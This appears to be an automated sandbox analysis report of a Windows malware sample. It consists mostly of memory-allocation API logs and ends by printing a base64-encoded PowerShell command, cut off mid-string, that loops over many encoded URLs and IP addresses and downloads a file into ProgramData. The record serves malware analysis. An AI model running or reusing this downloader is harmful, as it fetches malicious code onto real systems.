NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02951000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02952000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02800000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02801000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02802000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02803000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02804000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02805000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02806000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02807000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02808000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02809000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0280a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0280b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0280c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0280d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0280e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0280f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2023, 11:05 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -encodedcommand "JABOAG8AbgBkAGUAeAB0AGUAcgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEgAVQBBAGQAQQBCAHAAQQBHAE0AQQBiAEEAQgBsAEEARQAwAEEAWQBRAEIAeQBBAEcASQBBAGIAQQBCADUAQQBDADQAQQBiAGcAQgB5AEEASABjAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAFkAQQBMAGcAQQAzAEEARABRAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQA1AEEAQQA9AD0AbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABFAEEATgB3AEEAeABBAEMANABBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABNAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYgB3AEIAeQBBAEcAMABBAFkAUQBCAHMAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAcwBBAEcARQBBAFkAdwBCAHYAQQBHAFEAQQBaAFEAQgB5AEEARwAwAEEAYQBRAEEAdQBBAEcANABBAFkAUQBCAG4AQQBHADgAQQBlAFEAQgBoAEEAQQA9AD0AIgA7ACQAUAByAG8AZAB1AGMAdABpAG8AbgBhAGwAUABhAHMAdABpAGwAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBjAGcAQgBsAEEARwB3AEEAYQBRAEIAdQBBAEcAYwBBAGIAQQBCADUAQQBFAEUAQQBiAGcAQgAwAEEARwBrAEEAYgB3AEIAdwBBAEcAawBBAGQAUQBCAHQAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAdgBBAEcARQBBAFkAdwBCAG8AQQBBAD0APQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQB3AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AUQBBADEAQQBEAEkAQQAiADsAJABkAHIAbwBuAGUAcABpAHAAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFkAUQBCADAAQQBIAEkAQQBhAFEAQgBqAEEASABVAEEAYgBBAEIAaABBAEMANABBAFoAUQBCAHQAQQBHAEUAQQBhAFEAQgBzAEEAQQA9AD0AWgBrAEwAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEEAQQBMAGcAQQAwAEEARABNAEEATABnAEEANABBAEQAawBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQA9AFoAawBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAegBBAEgAUQBBAFoAUQBCAGgAQQBHAFEAQQBhAFEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFoAdwBCAHkAQQBHAGsAQQBjAEEAQgBsAEEAQQA9AD0AIgA7ACQAcgB1AG4AbgBlAHQAVQBuAGQAZQBuAHUAbgBjAGkAYQB0AG8AcgB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATgB3AEEAeQBBAEEAPQA9AGYAWABNAFQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBNAEEAYQBRAEIAMgBBAEcAawBBAGIAQQBCAGwAQQBDADQAQQBlAGcAQgBoAEEAQQA9AD0AZgBYAE0AVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBiAFEAQgBwAEEASABJAEEAWQBRAEIAdQBBAEcAZwBBAFkAUQBBAHUAQQBIAFEAQQBhAFEAQgBsAEEARwA0AEEAWgBBAEIAaABBAEEAPQA9ACIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQARQBBAE8AUQBBADIAQQBDADQAQQBNAGcAQQB5AEEARABnAEEATABnAEEAMwBBAEQAVQBBAEwAdwBBAHoAQQBGAE0AQQBSAGcAQgAwAEEAQwA4AEEAUwBRAEIAUQBBAEQAWQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEANQBBAEQAVQBBAEwAdwBCAHoAQQBDADgAQQBlAGcAQgBWAEEASABrAEEATgBnAEEAegBBAEEAPQA9AE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABjAEEATABnAEEAeQBBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAEEAQQB1AEEARABJAEEATQBnAEEAMQBBAEMAOABBAFQAZwBBADIAQQBFAHcAQQBUAFEAQgBDAEEAQwA4AEEAUgBBAEIAdABBAEUAWQBBAGUAUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBWAEEARwA0AEEAYgBRAEEAeQBBAEcAWQBBAGUAQQBCAFkAQQBGAGcAQQBWAGcAQgBoAEEARABjAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAFoAQQBFAGMAQQBNAFEAQgBSAEEARgBZAEEAWgBnAEEAMwBBAEUAbwBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEUAWQBBAGQAUQBCAFAAQQBEAGcAQQBlAFEAQQA0AEEASABrAEEAZQBBAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAGwAaQB0AHQAZQByACAAaQBuACAAJABtAGEAYwByAG8AcwBlAGkAcwBtAGkAYwAgAC0AcwBwAGwAaQB0ACAAIgBOACIAKQAgAHsAJABSAGUAdABhAGMAawBsAGUAUwBoAGEAaABhAHIAaQB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEAdwBBAEQAQQBBAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAZABRAEIAdQBBAEcANABBAGIAdwBCAHcAQQBIAE0AQQBhAFEAQgBrAEEARwBFAEEAWgBRAEEAdQBBAEcATQBBAGIAQQBCAGgAQQBHAGsAQQBiAFEAQgB6AEEAQQA9AD0AbABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFAAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAYQBBAEIAdgBBAEcASQBBAGEAUQBCAHYAQQBHAGMAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAcABBAEcATQBBAFkAUQBCAHMAQQBDADQAQQBjAFEAQgAxAEEARwBVAEEAWQBnAEIAbABBAEcATQBBACIAOwB0AHIAeQAgAHsAJABkAGkAcwByAG8AbwB0AFQAaQBtAG8AYwByAGEAdABpAGMAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAFEAQQA0AEEAQwA0AEEATQBnAEEAegBBAEQAQQBBAHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQB1AEEARABnAEEATQBRAEEAdQBBAEQAYwBBAE4AdwBBAD0AeABvAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAxAEEAQwA0AEEATgBnAEEAMABBAEEAPQA9AHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATwBBAEEAMgBBAEMANABBAE4AdwBBADMAQQBBAD0APQAiADsAJABoAGUAbABpAG8AdAByAG8AcABlAFMAdABlAHIAaQBsAGkAegBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABHAGwAaQB0AHQAZQByACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAaABlAGwAaQBvAHQAcgBvAHAAZQBTAHQAZQByAGkAbABpAHoAaQBuAGcAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUAByAGUAZQB4AHAAbABvAGQAaQBuAGcALgBHAGUAbwBjAGgAZQBtAGkAYwBhAGwAOwAkAEEAcABwAG8AcgB0AGkAbwBuAGUAZABBAHMAdAByAG8AYwB5AHQAbwBtAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBwAEEARwBZAEEAYQBRAEIAbABBAEcAUQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBWAEEARwA0AEEAYwB3AEIAMABBAEcAVQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBzAEEARwBrAEEAYQB3AEIAbABBAEMANABBAFoAUQBCAGgAQQBIAEkAQQBkAEEAQgBvAEEAQQA9AD0AdABKAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAbQBBAEgASQBBAGQAUQBCAHAAQQBIAFEAQQBaAGcAQgAxAEEARwB3AEEAYgBBAEIANQBBAEMANABBAFkAZwBCAHYAQQBIAFUAQQBkAEEAQgBwAEEASABFAEEAZABRAEIAbABBAEEAPQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBAHkAQQBEAEkAQQBOAFEAQQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEgAawBBAGMAdwBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBBAEEAdQBBAEcATQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQQA9ACIAOwAkAEcAcgBvAHcAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAGMAQQBjAGcAQgBwAEEARwBjAEEAWgB3AEIAcwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBZAHcAQgA1AEEARwAwAEEAYwBnAEIAMQBBAEEAPQA9AFoAWgBVAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANABBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBAHoAQQBBAD0APQAiADsAJABQAG8AbAB5AG0AbwBsAHkAYgBkAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEASABVAEEAWQBnAEIAdwBBAEgASQBBAGIAdwBCAG0AQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEcARQBBAGIAQQBCAFQAQQBHAEUAQQBhAFEAQgB1AEEASABRAEEAYgBBAEIANQBBAEMANABBAGMAdwBCADEAQQBIAEEAQQBjAEEAQgB2AEEASABJAEEAZABBAEEAPQBXAEMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQA1AEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATwBRAEEANQBBAEEAPQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFAAcgBlAGUAeABwAGwAbwBkAGkAbgBnAC4ARwBlAG8AYwBoAGUAbQBpAGMAYQBsACkALgBMAGUA